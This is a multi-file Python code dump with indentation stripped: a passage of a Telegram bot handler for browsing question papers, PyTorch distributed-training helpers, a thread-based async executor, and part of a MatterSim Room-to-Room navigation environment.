subs, papers = qpaper_utils.collect_subs_n_papers(course_full, branch_full, sem_in)
pre = [course_in, branch_in, sem_in]
if len(subs) == 0:
word += '\n _Unavailable_ \U0001F615'
query_log = {
'level': 3,
'course': course_full,
'branch': branch_full,
'semester': sem_in,
'subject': "",
'available': False
}
threading.Thread(target=query_collect, args=(query_log,), daemon=True).start()
else:
for sub in subs:
sub_ = ''.join(sub.split(' '))
callback_str = "qa={}".format('+'.join(pre))
callback_str += "+" + sub_
if len(callback_str) > 64:
logger.error("".join(text) + "=>" + callback_str + "#" + str(len(callback_str)))
callback_str = callback_str[:64]
logger.info("serialized to =>" + callback_str)
button_list.append(
InlineKeyboardButton(
text="{}".format(sub),
callback_data=callback_str,
)
)
# back_button data
back_data = "qa={}".format("+".join([course_in, branch_in]))
return button_list, word, colm, back_data
def course_branch_sem_sub(text):
button_list = []
colm = 1
course_in, branch_in, sem_in, sub_in = text
course_full = branch_full = ''
for module, tag in COURSES_LIST.items():
if course_in == tag:
course_full = module
break
for branch, key in BRANCHES_COURSE[course_full].items():
if branch_in == key:
branch_full = branch
break
subs, papers = qpaper_utils.collect_subs_n_papers(course_full, branch_full, sem_in)
is_avail = False
if len(subs) == 0:
word = '\n _Unavailable_ \U0001F615'
query_log = {
'level': 4,
'course': course_full,
'branch': branch_full,
'semester': sem_in,
'subject': sub_in,
'available': False
}
threading.Thread(target=query_collect, args=(query_log,), daemon=True).start()
else:
sub_index = None
for sub in subs:
format_callback_sub = ''.join(sub.split(' '))[:53]
# print(repr(format_callback_sub) + " ================ " + repr(sub_in))
# https://stackoverflow.com/questions/17667923/remove-n-or-t-from-a-given-string
# removing \t \n \r when comparing
if re.sub('\s+', '', format_callback_sub) == re.sub('\s+', '', sub_in):
sub_index = subs.index(sub)
break
papers_for_sub = papers[sub_index].items()
for name, url in papers_for_sub:
button_list.append(
InlineKeyboardButton(
text="{}".format(name),
url=BASE_URL + url,
)
)
word = "Papers for \n`{}`".format(sub_in)
is_avail = True
query_log = {
'level': 4,
'course': course_full,
'branch': branch_full,
'semester': sem_in,
'subject': sub_in,
'available': is_avail
}
threading.Thread(target=query_collect, args=(query_log,), daemon=True).start()
# back_button data
back_data = "qa={}".format("+".join([course_in, branch_in, sem_in]))
return button_list, word, colm, back_data
@run_async
def qpapers_button(update, context):
chat = update.effective_chat
context.bot.send_chat_action(chat_id=chat.id, action=ChatAction.TYPING)
query = update.callback_query
logger.info(query.data)
course_match = re.match(r"qa=(.+?)", query.data)
back_button_match = re.match(r"qa_back", query.data)
try:
if course_match:
text = query.data.split('=', 1)[1].split('+')
logger.info(text)
back_data = "qa_back"
if len(text) == 1:
# course selected => select branch
button_list, word, colm = course(text)
elif len(text) == 2:
# course, branch selected => select sem
button_list, word, colm, back_data = course_branch(text)
elif len(text) == 3:
# course, branch, sem selected => select subject
button_list, word, colm, back_data = course_branch_sem(text)
elif len(text) == 4:
# course, branch, sem, subject selected => send the links here
button_list, word, colm, back_data = course_branch_sem_sub(text)
else:
word = "Some Unknown Error\n Use /feedback to send feedback about this error)"
send_qpapers(update, text=word, keyboard=None)
return
# adding back button for easy traversing
footer_button = [InlineKeyboardButton(text="[Back]", callback_data=back_data)]
reply_markup_keyboard = InlineKeyboardMarkup(
button_menu.build_menu(
button_list,
n_cols=colm,
footer_buttons=footer_button
)
)
send_qpapers(update, text=word, keyboard=reply_markup_keyboard)
elif back_button_match:
get_qpapers(update, context)
# ensure no spinning white circle
context.bot.answer_callback_query(query.id)
query.message.delete()
except BadRequest as e:
if e.message == "Message is not modified":
pass
elif e.message == "Query_id_invalid":
pass
elif e.message == "Message can't be deleted":
pass
else:
logger.exception("Exception : %s", str(query.data))
# do not async
def send_qpapers(update, text, keyboard=None):
logger.info("into send_qpapers")
if not keyboard:
pass
update.effective_message.reply_text(text=text, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard)
@run_async
def get_qpapers(update, context):
logger.info("into get_qpapers")
chat = update.effective_chat
threading.Thread(target=user_collect, args=(chat,), daemon=True).start()
threading.Thread(target=command_collect, args=("qpapers",), daemon=True).start()
context.bot.send_chat_action(chat_id=chat.id, action=ChatAction.TYPING)
# ONLY send help in PM
if chat.type != chat.PRIVATE:
context.args = ['qpapers']
get_help(update, context)
else:
# called default
button_list = []
for module, tag in COURSES_LIST.items():
callback_data = 'qa={}'.format(tag)
text = "{}".format(module)
button_list.append(
InlineKeyboardButton(text=text,
callback_data=callback_data, ))
reply_markup_keyboard = InlineKeyboardMarkup(button_menu.build_menu(button_list, n_cols=2))
send_qpapers(
update=update,
text="Select Course",
keyboard=reply_markup_keyboard
)
|
distributed.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Distributed helpers."""
import multiprocessing
import os
import signal
import threading
import traceback
import torch
from xnas.core.config import cfg
def is_master_proc():
"""Determines if the current process is the master process.
Master process is responsible for logging, writing and loading checkpoints. In
the multi GPU setting, we assign the master role to the rank 0 process. When
training using a single GPU, there is a single process which is considered master.
"""
return cfg.NUM_GPUS == 1 or torch.distributed.get_rank() == 0
def init_process_group(proc_rank, world_size):
"""Initializes the default process group."""
# Set the GPU to use
torch.cuda.set_device(proc_rank)
# Initialize the process group
torch.distributed.init_process_group(
backend=cfg.DIST_BACKEND,
init_method="tcp://{}:{}".format(cfg.HOST, cfg.PORT),
world_size=world_size,
rank=proc_rank,
)
def destroy_process_group():
"""Destroys the default process group."""
torch.distributed.destroy_process_group()
def scaled_all_reduce(tensors):
"""Performs the scaled all_reduce operation on the provided tensors.
The input tensors are modified in-place. Currently supports only the sum
reduction operator. The reduced values are scaled by the inverse size of the
process group (equivalent to cfg.NUM_GPUS).
"""
# There is no need for reduction in the single-proc case
if cfg.NUM_GPUS == 1:
return tensors
# Queue the reductions
reductions = []
for tensor in tensors:
reduction = torch.distributed.all_reduce(tensor, async_op=True)
reductions.append(reduction)
# Wait for reductions to finish
for reduction in reductions:
reduction.wait()
# Scale the results
for tensor in tensors:
tensor.mul_(1.0 / cfg.NUM_GPUS)
return tensors
class ChildException(Exception):
"""Wraps an exception from a child process."""
def __init__(self, child_trace):
super(ChildException, self).__init__(child_trace)
class ErrorHandler(object):
"""Multiprocessing error handler (based on fairseq's).
Listens for errors in child processes and propagates the tracebacks to the parent.
"""
def __init__(self, error_queue):
# Shared error queue
self.error_queue = error_queue
# Children processes sharing the error queue
self.children_pids = []
# Start a thread listening to errors
self.error_listener = threading.Thread(target=self.listen, daemon=True)
self.error_listener.start()
# Register the signal handler
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
"""Registers a child process."""
self.children_pids.append(pid)
def listen(self):
"""Listens for errors in the error queue."""
# Wait until there is an error in the queue
child_trace = self.error_queue.get()
# Put the error back for the signal handler
self.error_queue.put(child_trace)
# Invoke the signal handler
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, _sig_num, _stack_frame):
"""Signal handler."""
# Kill children processes
for pid in self.children_pids:
os.kill(pid, signal.SIGINT)
# Propagate the error from the child process
raise ChildException(self.error_queue.get())
def run(proc_rank, world_size, error_queue, fun, fun_args, fun_kwargs):
"""Runs a function from a child process."""
try:
# Initialize the process group
init_process_group(proc_rank, world_size)
# Run the function
fun(*fun_args, **fun_kwargs)
except KeyboardInterrupt:
# Killed by the parent process
pass
except Exception:
# Propagate exception to the parent process
error_queue.put(traceback.format_exc())
finally:
# Destroy the process group
destroy_process_group()
def multi_proc_run(num_proc, fun, fun_args=(), fun_kwargs=None):
"""Runs a function in a multi-proc setting (unless num_proc == 1)."""
# There is no need for multi-proc in the single-proc case
fun_kwargs = fun_kwargs if fun_kwargs else {}
if num_proc == 1:
fun(*fun_args, **fun_kwargs)
return
# Handle errors from training subprocesses
error_queue = multiprocessing.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Run each training subprocess
ps = []
for i in range(num_proc):
p_i = multiprocessing.Process(
target=run, args=(i, num_proc, error_queue, fun, fun_args, fun_kwargs)
)
ps.append(p_i)
p_i.start()
error_handler.add_child(p_i.pid)
# Wait for each subprocess to finish
for p in ps:
p.join()
|
async_executor.py
|
import logging
from threading import Lock, Thread
logger = logging.getLogger(__name__)
class AsyncExecutor(object):
def __init__(self):
self._busy = False
self._thread_lock = Lock()
self._scheduled_action = None
self._scheduled_action_lock = Lock()
@property
def busy(self):
return self._busy
def schedule(self, action, immediately=False):
with self._scheduled_action_lock:
if self._scheduled_action is not None:
return self._scheduled_action
self._scheduled_action = action
self._busy = immediately
return None
@property
def scheduled_action(self):
with self._scheduled_action_lock:
return self._scheduled_action
def reset_scheduled_action(self):
with self._scheduled_action_lock:
self._scheduled_action = None
def run(self, func, args=()):
try:
return func(*args) if args else func()
except:
logger.exception('Exception during execution of long running task %s', self.scheduled_action)
finally:
with self:
self._busy = False
self.reset_scheduled_action()
def run_async(self, func, args=()):
self._busy = True
Thread(target=self.run, args=(func, args)).start()
def __enter__(self):
self._thread_lock.acquire()
def __exit__(self, *args):
self._thread_lock.release()
|
env.py
|
''' Batched Room-to-Room navigation environment '''
import sys
sys.path.append('build')
sys.path.append('../build')
import MatterSim
import csv
import numpy as np
import math
import base64
import utils
import json
import os
import random
import networkx as nx
from param import args
from utils import load_datasets, load_nav_graphs, Tokenizer
import threading
import queue
csv.field_size_limit(sys.maxsize)
from copy import copy, deepcopy
from multiprocessing import Process, Queue
import torch
# class data_fetch_worker(object):
# def __init__(self, io)
class ViewPoint():
def __init__(self,location):
self.viewpointId = location.viewpointId
self.ix = location.ix
# self.x = location.x
# self.y = location.y
# self.z = location.z
self.rel_heading = location.rel_heading
self.rel_elevation = location.rel_elevation
self.rel_distance = location.rel_distance
class State():
def __init__(self, state):
self.scanId = state.scanId
self.location = ViewPoint(state.location)
self.heading = state.heading
self.elevation = state.elevation
self.nevigableLocations = self.navigableLocations(state.navigableLocations)
self.viewIndex = state.viewIndex
def navigableLocations(self, locations):
res = []
for v in locations:
res.append(ViewPoint(v))
return res
class EnvBatch():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features '''
def __init__(self, feature_store=None, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The name of file stored the feature.
:param batch_size: Used to create the simulator list.
"""
if feature_store:
if type(feature_store) is dict: # A silly way to avoid multiple reading
self.features = feature_store
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.feature_size = next(iter(self.features.values())).shape[-1]
# print('The feature size is %d' % self.feature_size)
else:
print('Image features not provided')
self.features = None
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
self.batch_size = batch_size
for i in range(batch_size):
sim = MatterSim.Simulator()
sim.setRenderingEnabled(False)
sim.setDiscretizedViewingAngles(True) # Set increment/decrement to 30 degree. (otherwise by radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
def _make_id(self, scanId, viewpointId):
return scanId + '_' + viewpointId
def newEpisodes(self, scanIds, viewpointIds, headings, elevations=None):
if elevations is None:
elevations = np.zeros(len(headings))
for i, (scanId, viewpointId, heading, elevation) in enumerate(zip(scanIds, viewpointIds, headings, elevations)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.sims[i].newEpisode(scanId, viewpointId, heading, elevation)
def getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [ ((30, 2048), sim_state) ] * batch_size
"""
feature_states = []
for i, sim in enumerate(self.sims):
state = sim.getState()
long_id = self._make_id(state.scanId, state.location.viewpointId)
if self.features:
feature = self.features[long_id] # Get feature for
feature_states.append((feature, state))
else:
feature_states.append((None, state))
return feature_states
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
def copystate(self, env):
for i, sim in enumerate(self.sims):
state = env.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
def copyinstance(self):
env = EnvBatch(self.features, len(self.sims))
for i, sim in enumerate(env.sims):
state = self.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
return env
class EnvBatch_P():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features
Parallel version
'''
# For now, the agent can't pick which forward move to make - just the one in the middle
def __init__(self, feature_store=None, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The name of file stored the feature.
:param batch_size: Used to create the simulator list.
"""
if feature_store:
if type(feature_store) is dict: # A silly way to avoid multiple reading
self.features = feature_store
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.feature_size = next(iter(self.features.values())).shape[-1]
# print('The feature size is %d' % self.feature_size)
else:
print('Image features not provided')
self.features = None
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
self.qin = []
self.qout = []
self.qtraj = []
self.feature_states = None
self.batch_size = batch_size
for i in range(batch_size):
sim = MatterSim.Simulator()
sim.setRenderingEnabled(False)
sim.setDiscretizedViewingAngles(True) # Set increment/decrement to 30 degree. (otherwise by radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
self.qin.append(Queue())
self.qout.append(Queue())
self.qtraj.append(Queue())
self.pool = []
def function(i, sim, qin, qout, qtraj):
env_actions = {
'left': (0,-1, 0), # left
'right': (0, 1, 0), # right
'up': (0, 0, 1), # up
'down': (0, 0,-1), # down
'forward': (1, 0, 0), # forward
'<end>': (0, 0, 0), # <end>
'<start>': (0, 0, 0), # <start>
'<ignore>': (0, 0, 0) # <ignore>
}
while True:
op, x = qin.get()
# while not qout.empty():
# qout.get()
# while not qtraj.empty():
# qtraj.get()
if op == 'act':
select_candidate, src_point, trg_point, src_level, trg_level = x
traj = []
def take_action(i, name):
if type(name) is int: # Go to the next view
sim.makeAction(name, 0, 0)
else: # Adjust
sim.makeAction(*env_actions[name])
state = sim.getState()
traj.append((state.location.viewpointId, state.heading, state.elevation))
while src_level < trg_level: # Tune up
take_action(i, 'up')
src_level += 1
while src_level > trg_level: # Tune down
take_action(i, 'down')
src_level -= 1
while sim.getState().viewIndex != trg_point: # Turn right until the target
take_action(i, 'right')
assert select_candidate['viewpointId'] == \
sim.getState().navigableLocations[select_candidate['idx']].viewpointId
take_action(i, select_candidate['idx'])
state = sim.getState()
qout.put((state.scanId, state.location.viewpointId, state.heading, state.elevation))
# print(traj)
qtraj.put(traj)
elif op == 'new':
scanId, viewpointId, heading, elevation = x
sim.newEpisode(scanId, viewpointId, heading, elevation)
elif op == 'state':
state = sim.getState()
state = State(state)
# if name != 'env':
# setattr(env_copy,name,value)
qout.put(state)
for i in range(batch_size):
p = Process(target=function, args=(i, self.sims[i], self.qin[i], self.qout[i], self.qtraj[i]), daemon=True)
p.start()
self.pool.append(p)
def _make_id(self, scanId, viewpointId):
return scanId + '_' + viewpointId
def newEpisodes(self, scanIds, viewpointIds, headings, elevations=None):
if elevations is None:
elevations = np.zeros(len(headings))
for i, (scanId, viewpointId, heading, elevation) in enumerate(zip(scanIds, viewpointIds, headings, elevations)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.qin[i].put(('new',(scanId, viewpointId, heading, elevation)))
# self.sims[i].newEpisode(scanId, viewpointId, heading, 0)
self.feature_states = self._getStates()
def _getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [ ((30, 2048), sim_state) ] * batch_size
"""
feature_states = []
# for i, sim in enumerate(self.sims):
# state = sim.getState()
# long_id = self._make_id(state.scanId, state.location.viewpointId)
# if self.features:
# feature = self.features[long_id] # Get feature for
# feature_states.append((feature, state))
# else:
# feature_states.append((None, state))
for i in range(self.batch_size):
while not self.qout[i].empty():
self.qout[i].get()
while not self.qtraj[i].empty():
self.qtraj[i].get()
self.qin[i].put(('state',None))
for i in range(self.batch_size):
state = self.qout[i].get()
# print(state)
long_id = self._make_id(state.scanId, state.location.viewpointId)
if self.features:
feature = self.features[long_id] # Get feature for
feature_states.append((feature, state))
else:
feature_states.append((None, state))
return feature_states
def getStates(self):
if self.feature_states is None:
self.feature_states = self._getStates()
return self.feature_states
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
pool = []
def makeaction(i, env, index, heading, elevation, q):
env.makeAction(index, heading, elevation)
state = env.getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
q.put((i,scanId,viewpointId,heading,elevation))
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
p = Process(target=makeaction, args=(i,self.sims[i],index,heading,elevation,self.q))
p.start()
pool.append(p)
for p in pool:
p.join()
while not self.q.empty():
i, scanId, viewpointId, heading, elevation = self.q.get()
self.sims[i].newEpisode(scanId, viewpointId, heading, elevation)
def make_equiv_action(self, a_t, perm_obs, perm_idx=None, traj=None):
if perm_idx is None:
perm_idx = range(len(perm_obs))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1: # -1 is the <stop> action
select_candidate = perm_obs[i]['candidate'][action]
src_point = perm_obs[i]['viewIndex']
trg_point = select_candidate['pointId']
src_level = (src_point ) // 12 # The point idx started from 0
trg_level = (trg_point ) // 12
self.qin[idx].put(('act',(select_candidate, src_point, trg_point, src_level, trg_level)))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1:
if traj is not None:
res = self.qtraj[i].get()
traj[i]['path'] += res
scanId, viewpointId, heading, elevation = self.qout[i].get()
# idx = perm_idx[i]
# self.sims[idx].newEpisode(scanId, viewpointId, heading, elevation)
self.feature_states = self._getStates()
def copystate(self, env):
for i, sim in enumerate(self.sims):
state = env.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
def copyinstance(self):
env = EnvBatch(self.features, len(self.sims))
for i, sim in enumerate(env.sims):
state = self.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
return env
class EnvBatch_T():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features
Parallel version
'''
# For now, the agent can't pick which forward move to make - just the one in the middle
def __init__(self, feature_store=None, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The name of file stored the feature.
:param batch_size: Used to create the simulator list.
"""
if feature_store:
if type(feature_store) is dict: # A silly way to avoid multiple reading
self.features = feature_store
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.feature_size = next(iter(self.features.values())).shape[-1]
# print('The feature size is %d' % self.feature_size)
else:
print('Image features not provided')
self.features = None
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
self.qin = []
self.qout = []
self.qtraj = []
self.feature_states = None
self.batch_size = batch_size
for i in range(batch_size):
sim = MatterSim.Simulator()
sim.setRenderingEnabled(False)
sim.setDiscretizedViewingAngles(True) # Set increment/decrement to 30 degree. (otherwise by radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
self.qin.append(queue.Queue())
self.qout.append(queue.Queue())
self.qtraj.append(queue.Queue())
self.pool = []
def function(i, sim, qin, qout, qtraj):
env_actions = {
'left': (0,-1, 0), # left
'right': (0, 1, 0), # right
'up': (0, 0, 1), # up
'down': (0, 0,-1), # down
'forward': (1, 0, 0), # forward
'<end>': (0, 0, 0), # <end>
'<start>': (0, 0, 0), # <start>
'<ignore>': (0, 0, 0) # <ignore>
}
while True:
op, x = qin.get()
# while not qout.empty():
# qout.get()
# while not qtraj.empty():
# qtraj.get()
if op == 'act':
select_candidate, src_point, trg_point, src_level, trg_level = x
traj = []
def take_action(i, name):
if type(name) is int: # Go to the next view
sim.makeAction(name, 0, 0)
else: # Adjust
sim.makeAction(*env_actions[name])
state = sim.getState()
traj.append((state.location.viewpointId, state.heading, state.elevation))
while src_level < trg_level: # Tune up
take_action(i, 'up')
src_level += 1
while src_level > trg_level: # Tune down
take_action(i, 'down')
src_level -= 1
while sim.getState().viewIndex != trg_point: # Turn right until the target
take_action(i, 'right')
assert select_candidate['viewpointId'] == \
sim.getState().navigableLocations[select_candidate['idx']].viewpointId
take_action(i, select_candidate['idx'])
state = sim.getState()
qout.put((state.scanId, state.location.viewpointId, state.heading, state.elevation))
# print(traj)
qtraj.put(traj)
elif op == 'new':
scanId, viewpointId, heading, elevation = x
sim.newEpisode(scanId, viewpointId, heading, elevation)
elif op == 'state':
state = sim.getState()
state = State(state)
# if name != 'env':
# setattr(env_copy,name,value)
qout.put(state)
for i in range(batch_size):
p = threading.Thread(target=function, args=(i, self.sims[i], self.qin[i], self.qout[i], self.qtraj[i]), daemon=True)
p.start()
self.pool.append(p)
def _make_id(self, scanId, viewpointId):
return scanId + '_' + viewpointId
def newEpisodes(self, scanIds, viewpointIds, headings, elevations=None):
if elevations is None:
elevations = np.zeros(len(headings))
for i, (scanId, viewpointId, heading, elevation) in enumerate(zip(scanIds, viewpointIds, headings, elevations)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.qin[i].put(('new',(scanId, viewpointId, heading, elevation)))
# self.sims[i].newEpisode(scanId, viewpointId, heading, 0)
self.feature_states = self._getStates()
def _getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [ ((30, 2048), sim_state) ] * batch_size
"""
feature_states = []
# for i, sim in enumerate(self.sims):
# state = sim.getState()
# long_id = self._make_id(state.scanId, state.location.viewpointId)
# if self.features:
# feature = self.features[long_id] # Get feature for
# feature_states.append((feature, state))
# else:
# feature_states.append((None, state))
for i in range(self.batch_size):
while not self.qout[i].empty():
self.qout[i].get()
while not self.qtraj[i].empty():
self.qtraj[i].get()
self.qin[i].put(('state',None))
for i in range(self.batch_size):
state = self.qout[i].get()
# print(state)
long_id = self._make_id(state.scanId, state.location.viewpointId)
if self.features:
feature = self.features[long_id] # Get feature for
feature_states.append((feature, state))
else:
feature_states.append((None, state))
return feature_states
def getStates(self):
if self.feature_states is None:
self.feature_states = self._getStates()
return self.feature_states
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
pool = []
def makeaction(i, env, index, heading, elevation, q):
env.makeAction(index, heading, elevation)
state = env.getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
q.put((i,scanId,viewpointId,heading,elevation))
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
p = Process(target=makeaction, args=(i,self.sims[i],index,heading,elevation,self.q))
p.start()
pool.append(p)
for p in pool:
p.join()
while not self.q.empty():
i, scanId, viewpointId, heading, elevation = self.q.get()
self.sims[i].newEpisode(scanId, viewpointId, heading, elevation)
def make_equiv_action(self, a_t, perm_obs, perm_idx=None, traj=None):
if perm_idx is None:
perm_idx = range(len(perm_obs))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1: # -1 is the <stop> action
select_candidate = perm_obs[i]['candidate'][action]
src_point = perm_obs[i]['viewIndex']
trg_point = select_candidate['pointId']
src_level = (src_point ) // 12 # The point idx started from 0
trg_level = (trg_point ) // 12
self.qin[idx].put(('act',(select_candidate, src_point, trg_point, src_level, trg_level)))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1:
if traj is not None:
res = self.qtraj[i].get()
traj[i]['path'] += res
scanId, viewpointId, heading, elevation = self.qout[i].get()
# idx = perm_idx[i]
# self.sims[idx].newEpisode(scanId, viewpointId, heading, elevation)
self.feature_states = self._getStates()
def copystate(self, env):
for i, sim in enumerate(self.sims):
state = env.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
def copyinstance(self):
env = EnvBatch(self.features, len(self.sims))
for i, sim in enumerate(env.sims):
state = self.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
return env
class EnvBatchRGB():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features '''
def __init__(self, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The name of file stored the feature.
:param batch_size: Used to create the simulator list.
"""
self.features = None
self.image_w = 320
self.image_h = 320
self.vfov = 60
# self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
for i in range(batch_size):
sim = MatterSim.Simulator()
# sim.setRenderingEnabled(True)
sim.setDiscretizedViewingAngles(True) # Set increment/decrement to 30 degree. (otherwise by radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
print('finished')
def _make_id(self, scanId, viewpointId):
return scanId + '_' + viewpointId
def newEpisodes(self, scanIds, viewpointIds, headings):
for i, (scanId, viewpointId, heading) in enumerate(zip(scanIds, viewpointIds, headings)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.sims[i].newEpisode(scanId, viewpointId, heading, 0)
def getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [ ((30, 2048), sim_state) ] * batch_size
"""
feature_states = []
for i, sim in enumerate(self.sims):
state = sim.getState()
long_id = self._make_id(state.scanId, state.location.viewpointId)
if self.features:
feature = self.features[long_id] # Get feature for
feature_states.append((feature, state))
else:
feature_states.append((None, state))
return feature_states
def getRGB(self):
"""
get RGB
"""
rgb_list = []
for i, sim in enumerate(self.sims):
state = sim.getState()
img = Image.fromarray(np.array(state.rgb).astype(np.uint8))
img = np.array(img)
img = img[...,[2,1,0]]
rgb_list.append(img)
return rgb_list
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
class EnvBatchGraph():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features '''
def __init__(self, feature_store=None, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The name of file stored the feature.
:param batch_size: Used to create the simulator list.
"""
if feature_store:
if type(feature_store) is dict: # A silly way to avoid multiple reading
self.features = feature_store
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.feature_size = next(iter(self.features.values())).shape[-1]
print('The feature size is %d' % self.feature_size)
else:
print('Image features not provided')
self.features = None
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
for i in range(batch_size):
sim = MatterSim.Simulator()
sim.setRenderingEnabled(False)
sim.setDiscretizedViewingAngles(True) # Set increment/decrement to 30 degree. (otherwise by radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
def _make_id(self, scanId, viewpointId, angleId):
return scanId + '_' + viewpointId + '_' + angleId
def newEpisodes(self, scanIds, viewpointIds, headings):
for i, (scanId, viewpointId, heading) in enumerate(zip(scanIds, viewpointIds, headings)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.sims[i].newEpisode(scanId, viewpointId, heading, 0)
def getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [([64,2051]*36, sim_state)] * batch_size
"""
feature_states = []
for i, sim in enumerate(self.sims):
state = sim.getState()
features = []
for j in range(36):
long_id = self._make_id(state.scanId, state.location.viewpointId,str(j+1))
feature = self.features[long_id]
pad_num = 64-len(feature)
if pad_num > 0: # padding the feature to [64, 2051]
padding = np.zeros([pad_num, 2051])
feature = np.concatenate((feature,padding))
features.append(feature)
feature_states.append((features, state))
# if self.features:
# feature = self.features[long_id] # Get feature for
# feature_states.append((feature, state))
# else:
# feature_states.append((None, state))
return feature_states # [([64,2051]*36), sim_state] * batch_size
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
class R2RBatch():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None, record_scans=None):
if feature_store is None:
return
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
if splits is not None:
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
if item['instructions'] == '':
